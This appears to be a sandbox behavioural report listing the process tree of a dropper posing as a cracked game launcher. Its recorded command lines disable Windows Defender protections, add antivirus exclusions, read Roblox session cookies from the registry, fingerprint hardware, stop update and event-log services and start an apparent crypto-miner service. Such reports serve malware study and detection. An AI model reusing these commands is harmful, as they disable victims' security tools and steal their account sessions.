        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        8⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        8⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4964
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        8⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        9⤵
        
        PID:3920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        9⤵
        Executes dropped EXE
        
        PID:4272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Executes dropped EXE
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        9⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        9⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5076
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        9⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        10⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        10⤵
        Executes dropped EXE
        
        PID:3340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        10⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        10⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2388
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        10⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        11⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        11⤵
        Executes dropped EXE
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        11⤵
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        11⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3020
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        12⤵
        Views/modifies file attributes
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        
        PID:2312
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:5040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:2100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:3200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        
        PID:2548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:5012
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        12⤵
        
        PID:1332
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        13⤵
        Runs ping.exe
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1880
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        11⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3488
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        11⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        12⤵
        
        PID:4724
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        12⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1776
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        13⤵
        
        PID:228
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        14⤵
        
        PID:3920
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        13⤵
        
        PID:3536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:1228
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        13⤵
        Launches sc.exe
        
        PID:3900
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        13⤵
        Launches sc.exe
        
        PID:3492
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        13⤵
        Launches sc.exe
        
        PID:1880
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        13⤵
        Launches sc.exe
        
        PID:3420
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        13⤵
        Power Settings
        
        PID:3148
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        13⤵
        Power Settings
        
        PID:3256
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        13⤵
        Power Settings
        
        PID:4516
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        13⤵
        Power Settings
        
        PID:3604
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        13⤵
        
        PID:4064
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        13⤵
        Launches sc.exe
        
        PID:4860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        12⤵
        Executes dropped EXE
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        12⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        12⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2136
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        12⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        13⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        13⤵
        Executes dropped EXE
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        13⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2872
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        13⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        14⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        14⤵
        Executes dropped EXE
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        14⤵
        
        PID:2968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:872
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        15⤵
        Views/modifies file attributes
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        15⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:4504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:3420
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:3924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        
        PID:3248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:4124
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        15⤵
        
        PID:3904
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        Runs ping.exe
        
        PID:4332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        14⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        14⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4272
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        14⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        15⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        15⤵
        Executes dropped EXE
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        15⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        15⤵
        Executes dropped EXE
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        15⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        15⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        16⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        15⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        16⤵
        Executes dropped EXE
        
        PID:884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        16⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2224
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        17⤵
        Views/modifies file attributes
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        
        PID:1320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:4548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:1276
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:3964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        
        PID:4616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:3340
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:4332
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        17⤵
        
        PID:4504
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        Runs ping.exe
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        16⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        16⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4224
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        17⤵
        
        PID:3008
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        17⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        16⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        17⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:676
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        18⤵
        
        PID:3408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        
        PID:1692
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        19⤵
        
        PID:2220
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        18⤵
        
        PID:5112
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        18⤵
        Launches sc.exe
        
        PID:4852
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        18⤵
        
        PID:4268
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        18⤵
        Launches sc.exe
        
        PID:4520
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        18⤵
        
        PID:1484
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        18⤵
        Power Settings
        
        PID:3068
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
